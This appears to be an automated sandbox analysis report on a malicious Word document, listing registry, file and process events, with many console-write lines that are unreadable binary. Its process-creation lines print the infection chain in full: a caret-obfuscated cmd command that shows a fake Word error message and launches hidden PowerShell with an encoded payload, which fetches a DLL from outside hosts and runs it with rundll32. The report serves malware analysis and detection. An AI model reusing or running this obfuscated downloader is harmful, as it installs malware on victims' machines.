File created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmp

Jump to behavior

Source: ARCH_25_012021.doc

OLE indicator, Word Document stream: true

Source: ARCH_25_012021.doc

OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ........................................ .3.......3.............0.......................#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ................P...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................x.j......................{.............}..v.....=......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................x.j..... {...............{.............}..v....(>......0.T...............b.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................x.j......................{.............}..v.....J......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................x.j......b...............{.............}..v.....K......0.T.............8.b.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............lx.j......................{.............}..v....(.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............lx.j..... {...............{.............}..v............0.T...............b.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............\..j.....Gb...............{.............}..v............0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j....p.................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............\..j.....Gb...............{.............}..v............0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j....p.................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............\..j.....Gb...............{.............}..v............0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j....p.................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.T.............XDb.....(.......P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[..................j......................{.............}..v....@.......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.2.............}..v....P.......0.T.............XDb.....$.......P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j..... ................{.............}..v..... ......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P'......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....(................{.............}..v.....(......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P/......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....0................{.............}..v.....0......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P7......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....8................{.............}..v.....8......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P?......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....@................{.............}..v.....@......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....PG......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H................{.............}..v.....H......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....PO......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....P................{.............}..v.....P......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............\..j.....Gb...............{.............}..v....PW......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j.....X................{.............}..v.....X......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............\..j.....Gb...............{.............}..v....P_......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j.....`................{.............}..v.....`......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............\..j.....Gb...............{.............}..v....Pg......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j.....h................{.............}..v.....h......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K...............\..j.....Gb...............{.............}..v....Po......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j.....p................{.............}..v.....p......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............\..j.....Gb...............{.............}..v....Pw......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j.....x................{.............}..v.....x......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............Y.'.).}.}.c.a.t.c.h.{.}.}.$.B.5.8.I.=.(.'.O.3.'.+.'.5.I.'.).....0.T.............XDb.....<.......P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v............0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....`.................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....0.......0.T.....................r.......P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v....h.......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ .......\..j......................{.............}..v............0.T.............XDb.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v....0.......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................<}.j......................{.............}..v............0.T...............b.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................<}.j....E.n...............{.............}..v....x>......0.T...............b.............P...............	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString

Source: ARCH_25_012021.doc	Virustotal: Detection: 16%
Source: ARCH_25_012021.doc	ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1
